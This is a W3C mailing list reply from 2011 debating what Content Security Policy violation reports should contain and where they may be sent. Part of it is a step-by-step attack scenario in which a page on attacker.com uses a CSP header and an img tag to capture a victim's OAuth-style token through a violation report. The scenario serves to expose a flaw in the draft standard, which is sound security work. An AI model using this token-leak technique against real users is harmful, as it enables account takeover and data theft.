W3C home > Mailing lists > Public > public-web-security@w3.org > April 2011

Re: Violation reports

From: Adam Barth <w3c@adambarth.com>
Date: Thu, 21 Apr 2011 11:15:26 -0700
Message-ID: <BANLkTincOW2DFbGiCvjmRsXBa1qh5CCAxQ@mail.gmail.com>
To: Brandon Sterne <bsterne@mozilla.com>
Cc: public-web-security@w3.org
On Thu, Apr 21, 2011 at 10:32 AM, Brandon Sterne <bsterne@mozilla.com> wrote:
> I think many of your points below are valid, but I want to push back on
> a few things.
>
> (and apologies if I make less sense than normal... I'm under the
> influence of cold medicine)
>
> On 4/20/11 1:06 PM, Adam Barth wrote:
>> It seems like there's a trade-off in the violation reports between how
>> much information is contained in the report and which URIs are
>> acceptable values for report-uri.
>>
>> == Issues ==
>>
>> Currently, the spec says to restrict the report-uri to "public suffix
>> +1 DNS label."  Philosophically, I don't think we should be adding
>> more things to the web platform that depend on the public suffix list.
>>  That list is basically a hack we need to make cookies not be a
>> complete security disaster.  Having more things use the that list is
>> bad of the web.
>
> We could also restrict the report-uri to the same origin (or host) as
> the protected document.  This was how the directive was originally
> proposed.  Public suffix +1 was added as a response to folks who wanted
> to consolidate reports from multiple subdomains under one collector.

I agree that there's a use case for reporting to a different origin,
which is what got me thinking about parring down the report to
something that's safe to send anywhere.

>> Coming from the other direction, the violation reports current contain
>> too much information.  For example, a malicious web site can use the
>> blocked-uri field to learn where cross-origin redirects lead.  That's
>> exploitable in a number of scenarios, which I can explain in more
>> detail if you're unfamiliar with these attacks.
>
> Yes, the attacker can learn about where cross-origin redirects lead, but
> only if they get access to the report.  This is part of the motivation
> behind locking down the report-uri.

Locking down the report-uri doesn't really help.  Here's a specific
attack scenario.  Let's consider a fictional, simplified version of
OAuth called XAuth.  (I haven't checked whether the real OAuth
protocol actually interacts badly with these reports.)

1) Suppose https://mail.example.com/issueToken?to=X is an XAuth
endpoint that checks whether URL X is authorized to receive an XAuth
token for the current user (e.g., as identified by a cookie).  If so,
mail.example.com redirects back to X with the token appended as a
query parameter.

2) Suppose https://awesome-contacts.com/ is authorized to access
Alice's mail.example.com contact list.

3) Alice visits https://attacker.com.

In this scenario, I'll show that the attacker can obtain the XAuth
token for Alice's mail.example.com contact list.

1) When Alice visits https://attacker.com/, the attacker's server
responds with the following CSP policy:

X-Content-Security-Policy: img-src https://mail.example.com;
report-uri https://attacker.com/report.cgi

and the following HTML:

<img src="https://mail.example.com/issueToken?to=https://awesome-contacts.com/">

2) The CSP policy allows the request to https://mail.example.com.

3) mail.example.com checks the cookie to ensure that this request is
coming from Alice's browser and checks the value of the "to" parameter
to ensure that the URL is authorized to receive the token.  Both these
checks pass, and the server response with a redirect to
https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv.

4) The CSP policy does not allow the request to https://awesome-contacts.com.

5) Alice's browser generates a violation report containing the URL
https://awesome-contacts.com/?XAuthToken=3987nocvn0q23n9ancv and sends
that report to the report-uri, which is
https://attacker.com/report.cgi.

6) The attacker has learned the XAuth token for Alice's
mail.example.com contact list.

>> As another example, the SecurityViolation DOM event will contain the
>> raw Cookie header field in the request-headers field.  If the Cookie
>> header contains HttpOnly cookies, that will violation the security
>> requirements of HttpOnly cookies.
>
> Yes, this is true and I would propose to make a change to the spec that
> removes HttpOnly cookies from the request-headers field of the
> SecurityViolation event details.
>
>> == Proposal ==
>>
>> I recommend we simply violation reports to the point where we can send
>> them to any URI.  Specifically, we should include:
>>
>> 1) The document's URI.
>> 2) The directive that was violated.
>>
>> Notice that a bunch of other useful information (such as the
>> User-Agent and cookies) will be included in the request automagically.
>
> I definitely see the value of wanting a report format that carries no
> risk of exposure, but I think this removes a great deal of the value of
> the reports to the sites implementing CSP.
>
> Twitter's recent experience [1] in implementing CSP is a great example
> of what I'm talking about.  They learned through violation reports that
> downstream ISPs were inserting JavaScript and modifying images in the
> Twitter responses.  The blocked-uri field of the report was how they
> discovered this information.  Without that information in the report, it
> is unlikely that the developers alone could have tracked down the source
> of those violations, since they would likely receive a different looking
> response when they fetched those pages.
>
> There is another way in which sending more information in the reports is
> better: the ability to generate "signatures" for common violation
> reports.  There may be non-malicious violations that commonly occur on
> your site (think GreaseMonkey) and you might want to white list those
> particular violations.  If Document URI and violated-directive are the
> only fields in the report, it is very unlikely you could create
> meaningful signatures.

Maybe we should provide the hash of the blocked-uri?  Providing the
URL itself is dangerous, but you could still use the hash to create a
signature of known violations.  Of course, it would be harder to
figure out what was going wrong in the first place.

> I do think removing the request-headers field from the report sounds
> reasonable, as the bulk of that information could be transmitted in the
> report request "envelope".
>
>> As a side note, instead of using JSON, we should just use regular
>> application/x-www-form-urlencoded data.  JSON is very fashionable at
>> the moment, but every server framework already knows how to deal with
>> application/x-www-form-urlencoded data because that's what the <form>
>> element generates.
>
> I'm not crazy about this change, actually.  One of the things that is
> nice about JSON is that the same JSON object sent in the report POST
> body can be passed directly to the SecurityViolation event constructor
> as the detail argument.
>
> How would you construct the SecurityViolation event if you were using
> application/x-www-form-urlencoded as the report format?

IMHO, we should just get rid of the SecurityViolation event.  I was
hoping that we could use that instead of the report-uri, but you and
others have convinced me that sending an HTTP request with the report
is worthwhile.

Adam
Received on Thursday, 21 April 2011 18:16:27 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Thursday, 21 April 2011 18:16:27 GMT